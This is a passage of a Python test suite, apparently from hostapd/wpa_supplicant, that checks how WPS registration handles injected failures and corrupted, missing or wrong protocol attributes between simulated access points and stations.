os.remove(pskfile)
except:
pass
try:
with open(pskfile, "w") as f:
f.write("# WPA PSKs\n")
params = { "ssid": ssid, "eap_server": "1", "wps_state": "2",
"wpa": "2", "wpa_key_mgmt": "WPA-PSK",
"rsn_pairwise": "CCMP", "ap_pin": appin,
"wpa_psk_file": pskfile }
hapd = hostapd.add_ap(apdev[0], params)
dev[0].scan_for_bss(apdev[0]['bssid'], freq="2412")
with fail_test(hapd, 1, "os_get_random;wps_build_cred_network_key"):
dev[0].request("WPS_REG " + apdev[0]['bssid'] + " " + appin)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-FAILURE"], timeout=10)
if ev is None:
raise Exception("No EAP failure reported")
dev[0].request("WPS_CANCEL")
dev[0].wait_disconnected()
with fail_test(hapd, 1, "os_get_random;wps_build_cred"):
wps_run_pbc_fail_ap(apdev[0], dev[0], hapd)
with alloc_fail(hapd, 1, "wps_build_cred"):
wps_run_pbc_fail_ap(apdev[0], dev[0], hapd)
with alloc_fail(hapd, 2, "wps_build_cred"):
wps_run_pbc_fail_ap(apdev[0], dev[0], hapd)
finally:
os.remove(pskfile)
def wps_ext_eap_identity_req(dev, hapd, bssid):
logger.debug("EAP-Identity/Request")
ev = hapd.wait_event(["EAPOL-TX"], timeout=10)
if ev is None:
raise Exception("Timeout on EAPOL-TX from hostapd")
res = dev.request("EAPOL_RX " + bssid + " " + ev.split(' ')[2])
if "OK" not in res:
raise Exception("EAPOL_RX to wpa_supplicant failed")
def wps_ext_eap_identity_resp(hapd, dev, addr):
ev = dev.wait_event(["EAPOL-TX"], timeout=10)
if ev is None:
raise Exception("Timeout on EAPOL-TX from wpa_supplicant")
res = hapd.request("EAPOL_RX " + addr + " " + ev.split(' ')[2])
if "OK" not in res:
raise Exception("EAPOL_RX to hostapd failed")
def wps_ext_eap_wsc(dst, src, src_addr, msg):
logger.debug(msg)
ev = src.wait_event(["EAPOL-TX"], timeout=10)
if ev is None:
raise Exception("Timeout on EAPOL-TX")
res = dst.request("EAPOL_RX " + src_addr + " " + ev.split(' ')[2])
if "OK" not in res:
raise Exception("EAPOL_RX failed")
def wps_start_ext(apdev, dev, pbc=False, pin=None):
addr = dev.own_addr()
bssid = apdev['bssid']
ssid = "test-wps-conf"
params = { "ssid": ssid, "eap_server": "1", "wps_state": "2",
"wpa_passphrase": "12345678", "wpa": "2",
"wpa_key_mgmt": "WPA-PSK", "rsn_pairwise": "CCMP"}
hapd = hostapd.add_ap(apdev, params)
if pbc:
hapd.request("WPS_PBC")
else:
if pin is None:
pin = dev.wps_read_pin()
hapd.request("WPS_PIN any " + pin)
dev.scan_for_bss(bssid, freq="2412")
hapd.request("SET ext_eapol_frame_io 1")
dev.request("SET ext_eapol_frame_io 1")
if pbc:
dev.request("WPS_PBC " + bssid)
else:
dev.request("WPS_PIN " + bssid + " " + pin)
return addr,bssid,hapd
def wps_auth_corrupt(dst, src, addr):
ev = src.wait_event(["EAPOL-TX"], timeout=10)
if ev is None:
raise Exception("Timeout on EAPOL-TX")
src.request("SET ext_eapol_frame_io 0")
dst.request("SET ext_eapol_frame_io 0")
msg = ev.split(' ')[2]
if msg[-24:-16] != '10050008':
raise Exception("Could not find Authenticator attribute")
# Corrupt Authenticator value
msg = msg[:-1] + '%x' % ((int(msg[-1], 16) + 1) % 16)
res = dst.request("EAPOL_RX " + addr + " " + msg)
if "OK" not in res:
raise Exception("EAPOL_RX failed")
def wps_fail_finish(hapd, dev, fail_str):
ev = hapd.wait_event(["WPS-FAIL"], timeout=5)
if ev is None:
raise Exception("WPS-FAIL not indicated")
if fail_str not in ev:
raise Exception("Unexpected WPS-FAIL value: " + ev)
dev.request("WPS_CANCEL")
dev.wait_disconnected()
def wps_auth_corrupt_from_ap(dev, hapd, bssid, fail_str):
wps_auth_corrupt(dev, hapd, bssid)
wps_fail_finish(hapd, dev, fail_str)
def wps_auth_corrupt_to_ap(dev, hapd, addr, fail_str):
wps_auth_corrupt(hapd, dev, addr)
wps_fail_finish(hapd, dev, fail_str)
def test_ap_wps_authenticator_mismatch_m2(dev, apdev):
"""WPS and Authenticator attribute mismatch in M2"""
addr,bssid,hapd = wps_start_ext(apdev[0], dev[0])
wps_ext_eap_identity_req(dev[0], hapd, bssid)
wps_ext_eap_identity_resp(hapd, dev[0], addr)
wps_ext_eap_wsc(dev[0], hapd, bssid, "EAP-WSC/Start")
wps_ext_eap_wsc(hapd, dev[0], addr, "M1")
logger.debug("M2")
wps_auth_corrupt_from_ap(dev[0], hapd, bssid, "msg=5")
def test_ap_wps_authenticator_mismatch_m3(dev, apdev):
"""WPS and Authenticator attribute mismatch in M3"""
addr,bssid,hapd = wps_start_ext(apdev[0], dev[0])
wps_ext_eap_identity_req(dev[0], hapd, bssid)
wps_ext_eap_identity_resp(hapd, dev[0], addr)
wps_ext_eap_wsc(dev[0], hapd, bssid, "EAP-WSC/Start")
wps_ext_eap_wsc(hapd, dev[0], addr, "M1")
wps_ext_eap_wsc(dev[0], hapd, bssid, "M2")
logger.debug("M3")
wps_auth_corrupt_to_ap(dev[0], hapd, addr, "msg=7")
def test_ap_wps_authenticator_mismatch_m4(dev, apdev):
"""WPS and Authenticator attribute mismatch in M4"""
addr,bssid,hapd = wps_start_ext(apdev[0], dev[0])
wps_ext_eap_identity_req(dev[0], hapd, bssid)
wps_ext_eap_identity_resp(hapd, dev[0], addr)
wps_ext_eap_wsc(dev[0], hapd, bssid, "EAP-WSC/Start")
wps_ext_eap_wsc(hapd, dev[0], addr, "M1")
wps_ext_eap_wsc(dev[0], hapd, bssid, "M2")
wps_ext_eap_wsc(hapd, dev[0], addr, "M3")
logger.debug("M4")
wps_auth_corrupt_from_ap(dev[0], hapd, bssid, "msg=8")
def test_ap_wps_authenticator_mismatch_m5(dev, apdev):
"""WPS and Authenticator attribute mismatch in M5"""
addr,bssid,hapd = wps_start_ext(apdev[0], dev[0])
wps_ext_eap_identity_req(dev[0], hapd, bssid)
wps_ext_eap_identity_resp(hapd, dev[0], addr)
wps_ext_eap_wsc(dev[0], hapd, bssid, "EAP-WSC/Start")
wps_ext_eap_wsc(hapd, dev[0], addr, "M1")
wps_ext_eap_wsc(dev[0], hapd, bssid, "M2")
wps_ext_eap_wsc(hapd, dev[0], addr, "M3")
wps_ext_eap_wsc(dev[0], hapd, bssid, "M4")
logger.debug("M5")
wps_auth_corrupt_to_ap(dev[0], hapd, addr, "msg=9")
def test_ap_wps_authenticator_mismatch_m6(dev, apdev):
"""WPS and Authenticator attribute mismatch in M6"""
addr,bssid,hapd = wps_start_ext(apdev[0], dev[0])
wps_ext_eap_identity_req(dev[0], hapd, bssid)
wps_ext_eap_identity_resp(hapd, dev[0], addr)
wps_ext_eap_wsc(dev[0], hapd, bssid, "EAP-WSC/Start")
wps_ext_eap_wsc(hapd, dev[0], addr, "M1")
wps_ext_eap_wsc(dev[0], hapd, bssid, "M2")
wps_ext_eap_wsc(hapd, dev[0], addr, "M3")
wps_ext_eap_wsc(dev[0], hapd, bssid, "M4")
wps_ext_eap_wsc(hapd, dev[0], addr, "M5")
logger.debug("M6")
wps_auth_corrupt_from_ap(dev[0], hapd, bssid, "msg=10")
def test_ap_wps_authenticator_mismatch_m7(dev, apdev):
"""WPS and Authenticator attribute mismatch in M7"""
addr,bssid,hapd = wps_start_ext(apdev[0], dev[0])
wps_ext_eap_identity_req(dev[0], hapd, bssid)
wps_ext_eap_identity_resp(hapd, dev[0], addr)
wps_ext_eap_wsc(dev[0], hapd, bssid, "EAP-WSC/Start")
wps_ext_eap_wsc(hapd, dev[0], addr, "M1")
wps_ext_eap_wsc(dev[0], hapd, bssid, "M2")
wps_ext_eap_wsc(hapd, dev[0], addr, "M3")
wps_ext_eap_wsc(dev[0], hapd, bssid, "M4")
wps_ext_eap_wsc(hapd, dev[0], addr, "M5")
wps_ext_eap_wsc(dev[0], hapd, bssid, "M6")
logger.debug("M7")
wps_auth_corrupt_to_ap(dev[0], hapd, addr, "msg=11")
def test_ap_wps_authenticator_mismatch_m8(dev, apdev):
"""WPS and Authenticator attribute mismatch in M8"""
addr,bssid,hapd = wps_start_ext(apdev[0], dev[0])
wps_ext_eap_identity_req(dev[0], hapd, bssid)
wps_ext_eap_identity_resp(hapd, dev[0], addr)
wps_ext_eap_wsc(dev[0], hapd, bssid, "EAP-WSC/Start")
wps_ext_eap_wsc(hapd, dev[0], addr, "M1")
wps_ext_eap_wsc(dev[0], hapd, bssid, "M2")
wps_ext_eap_wsc(hapd, dev[0], addr, "M3")
wps_ext_eap_wsc(dev[0], hapd, bssid, "M4")
wps_ext_eap_wsc(hapd, dev[0], addr, "M5")
wps_ext_eap_wsc(dev[0], hapd, bssid, "M6")
wps_ext_eap_wsc(hapd, dev[0], addr, "M7")
logger.debug("M8")
wps_auth_corrupt_from_ap(dev[0], hapd, bssid, "msg=12")
def test_ap_wps_authenticator_missing_m2(dev, apdev):
"""WPS and Authenticator attribute missing from M2"""
addr,bssid,hapd = wps_start_ext(apdev[0], dev[0])
wps_ext_eap_identity_req(dev[0], hapd, bssid)
wps_ext_eap_identity_resp(hapd, dev[0], addr)
wps_ext_eap_wsc(dev[0], hapd, bssid, "EAP-WSC/Start")
wps_ext_eap_wsc(hapd, dev[0], addr, "M1")
logger.debug("M2")
ev = hapd.wait_event(["EAPOL-TX"], timeout=10)
if ev is None:
raise Exception("Timeout on EAPOL-TX")
hapd.request("SET ext_eapol_frame_io 0")
dev[0].request("SET ext_eapol_frame_io 0")
msg = ev.split(' ')[2]
if msg[-24:-16] != '10050008':
raise Exception("Could not find Authenticator attribute")
# Remove Authenticator value
msg = msg[:-24]
mlen = "%04x" % (int(msg[4:8], 16) - 12)
msg = msg[0:4] + mlen + msg[8:12] + mlen + msg[16:]
res = dev[0].request("EAPOL_RX " + bssid + " " + msg)
if "OK" not in res:
raise Exception("EAPOL_RX failed")
wps_fail_finish(hapd, dev[0], "msg=5")
def test_ap_wps_m2_dev_passwd_id_p2p(dev, apdev):
"""WPS and M2 with different Device Password ID (P2P)"""
addr,bssid,hapd = wps_start_ext(apdev[0], dev[0])
wps_ext_eap_identity_req(dev[0], hapd, bssid)
wps_ext_eap_identity_resp(hapd, dev[0], addr)
wps_ext_eap_wsc(dev[0], hapd, bssid, "EAP-WSC/Start")
wps_ext_eap_wsc(hapd, dev[0], addr, "M1")
logger.debug("M2")
ev = hapd.wait_event(["EAPOL-TX"], timeout=10)
if ev is None:
raise Exception("Timeout on EAPOL-TX")
hapd.request("SET ext_eapol_frame_io 0")
dev[0].request("SET ext_eapol_frame_io 0")
msg = ev.split(' ')[2]
if msg[722:730] != '10120002':
raise Exception("Could not find Device Password ID attribute")
# Replace Device Password ID value. This will fail Authenticator check, but
# allows the code path in wps_process_dev_pw_id() to be checked from debug
# log.
msg = msg[0:730] + "0005" + msg[734:]
res = dev[0].request("EAPOL_RX " + bssid + " " + msg)
if "OK" not in res:
raise Exception("EAPOL_RX failed")
wps_fail_finish(hapd, dev[0], "msg=5")
def test_ap_wps_m2_dev_passwd_id_change_pin_to_pbc(dev, apdev):
"""WPS and M2 with different Device Password ID (PIN to PBC)"""
addr,bssid,hapd = wps_start_ext(apdev[0], dev[0])
wps_ext_eap_identity_req(dev[0], hapd, bssid)
wps_ext_eap_identity_resp(hapd, dev[0], addr)
wps_ext_eap_wsc(dev[0], hapd, bssid, "EAP-WSC/Start")
wps_ext_eap_wsc(hapd, dev[0], addr, "M1")
logger.debug("M2")
ev = hapd.wait_event(["EAPOL-TX"], timeout=10)
if ev is None:
raise Exception("Timeout on EAPOL-TX")
hapd.request("SET ext_eapol_frame_io 0")
dev[0].request("SET ext_eapol_frame_io 0")
msg = ev.split(' ')[2]
if msg[722:730] != '10120002':
raise Exception("Could not find Device Password ID attribute")
# Replace Device Password ID value (PIN --> PBC). This will be rejected.
msg = msg[0:730] + "0004" + msg[734:]
res = dev[0].request("EAPOL_RX " + bssid + " " + msg)
if "OK" not in res:
raise Exception("EAPOL_RX failed")
wps_fail_finish(hapd, dev[0], "msg=5")
def test_ap_wps_m2_dev_passwd_id_change_pbc_to_pin(dev, apdev):
"""WPS and M2 with different Device Password ID (PBC to PIN)"""
addr,bssid,hapd = wps_start_ext(apdev[0], dev[0], pbc=True)
wps_ext_eap_identity_req(dev[0], hapd, bssid)
wps_ext_eap_identity_resp(hapd, dev[0], addr)
wps_ext_eap_wsc(dev[0], hapd, bssid, "EAP-WSC/Start")
wps_ext_eap_wsc(hapd, dev[0], addr, "M1")
logger.debug("M2")
ev = hapd.wait_event(["EAPOL-TX"], timeout=10)
if ev is None:
raise Exception("Timeout on EAPOL-TX")
hapd.request("SET ext_eapol_frame_io 0")
dev[0].request("SET ext_eapol_frame_io 0")
msg = ev.split(' ')[2]
if msg[722:730] != '10120002':
raise Exception("Could not find Device Password ID attribute")
# Replace Device Password ID value. This will fail Authenticator check, but
# allows the code path in wps_process_dev_pw_id() to be checked from debug
# log.
msg = msg[0:730] + "0000" + msg[734:]
res = dev[0].request("EAPOL_RX " + bssid + " " + msg)
if "OK" not in res:
raise Exception("EAPOL_RX failed")
wps_fail_finish(hapd, dev[0], "msg=5")
dev[0].flush_scan_cache()
def test_ap_wps_m2_missing_dev_passwd_id(dev, apdev):
"""WPS and M2 without Device Password ID"""
addr,bssid,hapd = wps_start_ext(apdev[0], dev[0])
wps_ext_eap_identity_req(dev[0], hapd, bssid)
wps_ext_eap_identity_resp(hapd, dev[0], addr)
wps_ext_eap_wsc(dev[0], hapd, bssid, "EAP-WSC/Start")
wps_ext_eap_wsc(hapd, dev[0], addr, "M1")
logger.debug("M2")
ev = hapd.wait_event(["EAPOL-TX"], timeout=10)
if ev is None:
raise Exception("Timeout on EAPOL-TX")
hapd.request("SET ext_eapol_frame_io 0")
dev[0].request("SET ext_eapol_frame_io 0")
msg = ev.split(' ')[2]
if msg[722:730] != '10120002':
raise Exception("Could not find Device Password ID attribute")
# Remove Device Password ID value. This will fail Authenticator check, but
# allows the code path in wps_process_dev_pw_id() to be checked from debug
# log.
mlen = "%04x" % (int(msg[4:8], 16) - 6)
msg = msg[0:4] + mlen + msg[8:12] + mlen + msg[16:722] + msg[734:]
res = dev[0].request("EAPOL_RX " + bssid + " " + msg)
if "OK" not in res:
raise Exception("EAPOL_RX failed")
wps_fail_finish(hapd, dev[0], "msg=5")
def test_ap_wps_m2_missing_registrar_nonce(dev, apdev):
"""WPS and M2 without Registrar Nonce"""
addr,bssid,hapd = wps_start_ext(apdev[0], dev[0], pbc=True)
wps_ext_eap_identity_req(dev[0], hapd, bssid)
wps_ext_eap_identity_resp(hapd, dev[0], addr)
wps_ext_eap_wsc(dev[0], hapd, bssid, "EAP-WSC/Start")
wps_ext_eap_wsc(hapd, dev[0], addr, "M1")
logger.debug("M2")
ev = hapd.wait_event(["EAPOL-TX"], timeout=10)
if ev is None:
raise Exception("Timeout on EAPOL-TX")
hapd.request("SET ext_eapol_frame_io 0")
dev[0].request("SET ext_eapol_frame_io 0")
msg = ev.split(' ')[2]
if msg[96:104] != '10390010':
raise Exception("Could not find Registrar Nonce attribute")
# Remove Registrar Nonce. This will fail Authenticator check, but
# allows the code path in wps_process_registrar_nonce() to be checked from
# the debug log.
mlen = "%04x" % (int(msg[4:8], 16) - 20)
msg = msg[0:4] + mlen + msg[8:12] + mlen + msg[16:96] + msg[136:]
res = dev[0].request("EAPOL_RX " + bssid + " " + msg)
if "OK" not in res:
raise Exception("EAPOL_RX failed")
ev = dev[0].wait_event(["CTRL-EVENT-DISCONNECT"], timeout=5)
if ev is None:
raise Exception("Disconnect event not seen")
dev[0].request("WPS_CANCEL")
dev[0].flush_scan_cache()
def test_ap_wps_m2_missing_enrollee_nonce(dev, apdev):
"""WPS and M2 without Enrollee Nonce"""
addr,bssid,hapd = wps_start_ext(apdev[0], dev[0], pbc=True)
wps_ext_eap_identity_req(dev[0], hapd, bssid)
wps_ext_eap_identity_resp(hapd, dev[0], addr)
wps_ext_eap_wsc(dev[0], hapd, bssid, "EAP-WSC/Start")
wps_ext_eap_wsc(hapd, dev[0], addr, "M1")
logger.debug("M2")
ev = hapd.wait_event(["EAPOL-TX"], timeout=10)
if ev is None:
raise Exception("Timeout on EAPOL-TX")
hapd.request("SET ext_eapol_frame_io 0")
dev[0].request("SET ext_eapol_frame_io 0")
msg = ev.split(' ')[2]
if msg[56:64] != '101a0010':
raise Exception("Could not find enrollee Nonce attribute")
# Remove Enrollee Nonce. This will fail Authenticator check, but
# allows the code path in wps_process_enrollee_nonce() to be checked from
# the debug log.
mlen = "%04x" % (int(msg[4:8], 16) - 20)
msg = msg[0:4] + mlen + msg[8:12] + mlen + msg[16:56] + msg[96:]
res = dev[0].request("EAPOL_RX " + bssid + " " + msg)
if "OK" not in res:
raise Exception("EAPOL_RX failed")
ev = dev[0].wait_event(["CTRL-EVENT-DISCONNECT"], timeout=5)
if ev is None:
raise Exception("Disconnect event not seen")
dev[0].request("WPS_CANCEL")
dev[0].flush_scan_cache()
def test_ap_wps_m2_missing_uuid_r(dev, apdev):
"""WPS and M2 without UUID-R"""
addr,bssid,hapd = wps_start_ext(apdev[0], dev[0], pbc=True)
wps_ext_eap_identity_req(dev[0], hapd, bssid)
wps_ext_eap_identity_resp(hapd, dev[0], addr)
wps_ext_eap_wsc(dev[0], hapd, bssid, "EAP-WSC/Start")
wps_ext_eap_wsc(hapd, dev[0], addr, "M1")
logger.debug("M2")
ev = hapd.wait_event(["EAPOL-TX"], timeout=10)
if ev is None:
raise Exception("Timeout on EAPOL-TX")
hapd.request("SET ext_eapol_frame_io 0")
dev[0].request("SET ext_eapol_frame_io 0")
msg = ev.split(' ')[2]
if msg[136:144] != '10480010':
raise Exception("Could not find enrollee Nonce attribute")
# Remove UUID-R. This will fail Authenticator check, but allows the code
# path in wps_process_uuid_r() to be checked from the debug log.
mlen = "%04x" % (int(msg[4:8], 16) - 20)
msg = msg[0:4] + mlen + msg[8:12] + mlen + msg[16:136] + msg[176:]
res = dev[0].request("EAPOL_RX " + bssid + " " + msg)
if "OK" not in res:
raise Exception("EAPOL_RX failed")
ev = dev[0].wait_event(["CTRL-EVENT-DISCONNECT"], timeout=5)
if ev is None:
raise Exception("Disconnect event not seen")
dev[0].request("WPS_CANCEL")
dev[0].flush_scan_cache()
def test_ap_wps_m2_invalid(dev, apdev):
"""WPS and M2 parsing failure"""
addr,bssid,hapd = wps_start_ext(apdev[0], dev[0], pbc=True)
wps_ext_eap_identity_req(dev[0], hapd, bssid)
wps_ext_eap_identity_resp(hapd, dev[0], addr)
wps_ext_eap_wsc(dev[0], hapd, bssid, "EAP-WSC/Start")
wps_ext_eap_wsc(hapd, dev[0], addr, "M1")
logger.debug("M2")
ev = hapd.wait_event(["EAPOL-TX"], timeout=10)
if ev is None:
raise Exception("Timeout on EAPOL-TX")
hapd.request("SET ext_eapol_frame_io 0")
dev[0].request("SET ext_eapol_frame_io 0")
msg = ev.split(' ')[2]
if msg[136:144] != '10480010':
raise Exception("Could not find enrollee Nonce attribute")
# Remove UUID-R. This will fail Authenticator check, but allows the code
# path in wps_process_uuid_r() to be checked from the debug log.
mlen = "%04x" % (int(msg[4:8], 16) - 1)
msg = msg[0:4] + mlen + msg[8:12] + mlen + msg[16:-2]
res = dev[0].request("EAPOL_RX " + bssid + " " + msg)
if "OK" not in res:
raise Exception("EAPOL_RX failed")
ev = dev[0].wait_event(["CTRL-EVENT-DISCONNECT"], timeout=5)
if ev is None:
raise Exception("Disconnect event not seen")
dev[0].request("WPS_CANCEL")
dev[0].flush_scan_cache()
def test_ap_wps_m2_missing_msg_type(dev, apdev):
"""WPS and M2 without Message Type"""
addr,bssid,hapd = wps_start_ext(apdev[0], dev[0], pbc=True)
wps_ext_eap_identity_req(dev[0], hapd, bssid)
wps_ext_eap_identity_resp(hapd, dev[0], addr)
wps_ext_eap_wsc(dev[0], hapd, bssid, "EAP-WSC/Start")
wps_ext_eap_wsc(hapd, dev[0], addr, "M1")
logger.debug("M2")
ev = hapd.wait_event(["EAPOL-TX"], timeout=10)
if ev is None:
raise Exception("Timeout on EAPOL-TX")
hapd.request("SET ext_eapol_frame_io 0")
dev[0].request("SET ext_eapol_frame_io 0")
msg = ev.split(' ')[2]
if msg[46:54] != '10220001':
raise Exception("Could not find Message Type attribute")
# Remove Message Type. This will fail Authenticator check, but allows the
# code path in wps_process_wsc_msg() to be checked from the debug log.
mlen = "%04x" % (int(msg[4:8], 16) - 5)
msg = msg[0:4] + mlen + msg[8:12] + mlen + msg[16:46] + msg[56:]
res = dev[0].request("EAPOL_RX " + bssid + " " + msg)
if "OK" not in res:
raise Exception("EAPOL_RX failed")
ev = dev[0].wait_event(["CTRL-EVENT-DISCONNECT"], timeout=5)
if ev is None:
raise Exception("Disconnect event not seen")
dev[0].request("WPS_CANCEL")
dev[0].flush_scan_cache()
def test_ap_wps_m2_unknown_msg_type(dev, apdev):
"""WPS and M2 but unknown Message Type"""
addr,bssid,hapd = wps_start_ext(apdev[0], dev[0], pbc=True)
wps_ext_eap_identity_req(dev[0], hapd, bssid)
wps_ext_eap_identity_resp(hapd, dev[0], addr)
wps_ext_eap_wsc(dev[0], hapd, bssid, "EAP-WSC/Start")
wps_ext_eap_wsc(hapd, dev[0], addr, "M1")
logger.debug("M2")
ev = hapd.wait_event(["EAPOL-TX"], timeout=10)
if ev is None:
raise Exception("Timeout on EAPOL-TX")
hapd.request("SET ext_eapol_frame_io 0")
dev[0].request("SET ext_eapol_frame_io 0")
msg = ev.split(' ')[2]
if msg[46:54] != '10220001':
raise Exception("Could not find Message Type attribute")
# Replace Message Type value. This will be rejected.
msg = msg[0:54] + "00" + msg[56:]
res = dev[0].request("EAPOL_RX " + bssid + " " + msg)
if "OK" not in res:
raise Exception("EAPOL_RX failed")
ev = dev[0].wait_event(["CTRL-EVENT-DISCONNECT"], timeout=5)
if ev is None:
raise Exception("Disconnect event not seen")
dev[0].request("WPS_CANCEL")
dev[0].flush_scan_cache()
def test_ap_wps_m2_unknown_opcode(dev, apdev):
"""WPS and M2 but unknown opcode"""
addr,bssid,hapd = wps_start_ext(apdev[0], dev[0], pbc=True)
wps_ext_eap_identity_req(dev[0], hapd, bssid)
wps_ext_eap_identity_resp(hapd, dev[0], addr)
wps_ext_eap_wsc(dev[0], hapd, bssid, "EAP-WSC/Start")
wps_ext_eap_wsc(hapd, dev[0], addr, "M1")
logger.debug("M2")
ev = hapd.wait_event(["EAPOL-TX"], timeout=10)
if ev is None:
raise Exception("Timeout on EAPOL-TX")
hapd.request("SET ext_eapol_frame_io 0")
dev[0].request("SET ext_eapol_frame_io 0")
msg = ev.split(' ')[2]
# Replace opcode. This will be discarded in EAP-WSC processing.
msg = msg[0:32] + "00" + msg[34:]
res = dev[0].request("EAPOL_RX " + bssid + " " + msg)
if "OK" not in res:
raise Exception("EAPOL_RX failed")
dev[0].request("WPS_CANCEL")
dev[0].wait_disconnected()
dev[0].flush_scan_cache()
def test_ap_wps_m2_unknown_opcode2(dev, apdev):
"""WPS and M2 but unknown opcode (WSC_Start)"""
addr,bssid,hapd = wps_start_ext(apdev[0], dev[0], pbc=True)
wps_ext_eap_identity_req(dev[0], hapd, bssid)
wps_ext_eap_identity_resp(hapd, dev[0], addr)
wps_ext_eap_wsc(dev[0], hapd, bssid, "EAP-WSC/Start")
wps_ext_eap_wsc(hapd, dev[0], addr, "M1")
logger.debug("M2")
ev = hapd.wait_event(["EAPOL-TX"], timeout=10)
if ev is None:
raise Exception("Timeout on EAPOL-TX")
hapd.request("SET ext_eapol_frame_io 0")
dev[0].request("SET ext_eapol_frame_io 0")
msg = ev.split(' ')[2]
# Replace opcode. This will be discarded in EAP-WSC processing.
msg = msg[0:32] + "01" + msg[34:]
res = dev[0].request("EAPOL_RX " + bssid + " " + msg)
if "OK" not in res:
raise Exception("EAPOL_RX failed")
dev[0].request("WPS_CANCEL")
dev[0].wait_disconnected()
dev[0].flush_scan_cache()
def test_ap_wps_m2_unknown_opcode3(dev, apdev):
"""WPS and M2 but unknown opcode (WSC_Done)"""
addr,bssid,hapd = wps_start_ext(apdev[0], dev[0], pbc=True)
wps_ext_eap_identity_req(dev[0], hapd, bssid)
wps_ext_eap_identity_resp(hapd, dev[0], addr)
wps_ext_eap_wsc(dev[0], hapd, bssid, "EAP-WSC/Start")
wps_ext_eap_wsc(hapd, dev[0], addr, "M1")
logger.debug("M2")
ev = hapd.wait_event(["EAPOL-TX"], timeout=10)
if ev is None:
raise Exception("Timeout on EAPOL-TX")
hapd.request("SET ext_eapol_frame_io 0")
dev[0].request("SET ext_eapol_frame_io 0")
msg = ev.split(' ')[2]
# Replace opcode. This will be discarded in WPS Enrollee processing.
msg = msg[0:32] + "05" + msg[34:]
res = dev[0].request("EAPOL_RX " + bssid + " " + msg)
if "OK" not in res:
raise Exception("EAPOL_RX failed")
dev[0].request("WPS_CANCEL")
dev[0].wait_disconnected()
dev[0].flush_scan_cache()
def wps_m2_but_other(dev, apdev, title, msgtype):
addr,bssid,hapd = wps_start_ext(apdev, dev)
wps_ext_eap_identity_req(dev, hapd, bssid)
wps_ext_eap_identity_resp(hapd, dev, addr)
wps_ext_eap_wsc(dev, hapd, bssid, "EAP-WSC/Start")
wps_ext_eap_wsc(hapd, dev, addr, "M1")
logger.debug(title)
ev = hapd.wait_event(["EAPOL-TX"], timeout=10)
if ev is None:
raise Exception("Timeout on EAPOL-TX")
hapd.request("SET ext_eapol_frame_io 0")
dev.request("SET ext_eapol_frame_io 0")
msg = ev.split(' ')[2]
if msg[46:54] != '10220001':
raise Exception("Could not find Message Type attribute")
# Replace Message Type value. This will be rejected.
msg = msg[0:54] + msgtype + msg[56:]
res = dev.request("EAPOL_RX " + bssid + " " + msg)
if "OK" not in res:
raise Exception("EAPOL_RX failed")
ev = dev.wait_event(["WPS-FAIL"], timeout=5)
if ev is None:
raise Exception("WPS-FAIL event not seen")
dev.request("WPS_CANCEL")
dev.wait_disconnected()
def wps_m4_but_other(dev, apdev, title, msgtype):
addr,bssid,hapd = wps_start_ext(apdev, dev)
wps_ext_eap_identity_req(dev, hapd, bssid)
wps_ext_eap_identity_resp(hapd, dev, addr)
wps_ext_eap_wsc(dev, hapd, bssid, "EAP-WSC/Start")
wps_ext_eap_wsc(hapd, dev, addr, "M1")
wps_ext_eap_wsc(dev, hapd, bssid, "M2")
wps_ext_eap_wsc(hapd, dev, addr, "M3")
logger.debug(title)
ev = hapd.wait_event(["EAPOL-TX"], timeout=10)
if ev is None:
raise Exception("Timeout on EAPOL-TX")
hapd.request("SET ext_eapol_frame_io 0")
dev.request("SET ext_eapol_frame_io 0")
msg = ev.split(' ')[2]
if msg[46:54] != '10220001':
raise Exception("Could not find Message Type attribute")
# Replace Message Type value. This will be rejected.
msg = msg[0:54] + msgtype + msg[56:]
res = dev.request("EAPOL_RX " + bssid + " " + msg)
if "OK" not in res:
raise Exception("EAPOL_RX failed")
ev = hapd.wait_event(["WPS-FAIL"], timeout=5)
if ev is None:
raise Exception("WPS-FAIL event not seen")
dev.request("WPS_CANCEL")
dev.wait_disconnected()
def test_ap_wps_m2_msg_type_m4(dev, apdev):
"""WPS and M2 but Message Type M4"""
wps_m2_but_other(dev[0], apdev[0], "M2/M4", "08")
def test_ap_wps_m2_msg_type_m6(dev, apdev):
"""WPS and M2 but Message Type M6"""
wps_m2_but_other(dev[0], apdev[0], "M2/M6", "0a")
def test_ap_wps_m2_msg_type_m8(dev, apdev):
"""WPS and M2 but Message Type M8"""
wps_m2_but_other(dev[0], apdev[0], "M2/M8", "0c")
def test_ap_wps_m4_msg_type_m2(dev, apdev):
"""WPS and M4 but Message Type M2"""
wps_m4_but_other(dev[0], apdev[0], "M4/M2", "05")
def test_ap_wps_m4_msg_type_m2d(dev, apdev):
"""WPS and M4 but Message Type M2D"""
wps_m4_but_other(dev[0], apdev[0], "M4/M2D", "06")
@remote_compatible
def test_ap_wps_config_methods(dev, apdev):
"""WPS configuration method parsing"""
ssid = "test-wps-conf"
params = { "ssid": ssid, "eap_server": "1", "wps_state": "2",
"wpa_passphrase": "12345678", "wpa": "2",
"wpa_key_mgmt": "WPA-PSK", "rsn_pairwise": "CCMP",
"config_methods": "ethernet display ext_nfc_token int_nfc_token physical_display physical_push_button" }
hapd = hostapd.add_ap(apdev[0], params)
params = { "ssid": ssid, "eap_server": "1", "wps_state": "2",
"wpa_passphrase": "12345678", "wpa": "2",
"wpa_key_mgmt": "WPA-PSK", "rsn_pairwise": "CCMP",
"config_methods": "display push_button" }
hapd2 = hostapd.add_ap(apdev[1], params)
def test_ap_wps_set_selected_registrar_proto(dev, apdev):
"""WPS UPnP SetSelectedRegistrar protocol testing"""
ap_uuid = "27ea801a-9e5c-4e73-bd82-f89cbcd10d7e"
hapd = add_ssdp_ap(apdev[0], ap_uuid)
location = ssdp_get_location(ap_uuid)
urls = upnp_get_urls(location)
eventurl = urlparse(urls['event_sub_url'])
ctrlurl = urlparse(urls['control_url'])
url = urlparse(location)
conn = HTTPConnection(url.netloc)
class WPSERHTTPServer(StreamRequestHandler):
def handle(self):
data = self.rfile.readline().strip()
logger.debug(data)
self.wfile.write(gen_wps_event())
server = MyTCPServer(("127.0.0.1", 12345), WPSERHTTPServer)
server.timeout = 1
headers = { "callback": '<http://127.0.0.1:12345/event>',
"NT": "upnp:event",
"timeout": "Second-1234" }
conn.request("SUBSCRIBE", eventurl.path, "\r\n\r\n", headers)
resp = conn.getresponse()
if resp.status != 200:
raise Exception("Unexpected HTTP response: %d" % resp.status)
sid = resp.getheader("sid")
logger.debug("Subscription SID " + sid)
server.handle_request()
tests = [ (500, "10"),
(200, "104a000110" + "1041000101" + "101200020000" +
"105300023148" +
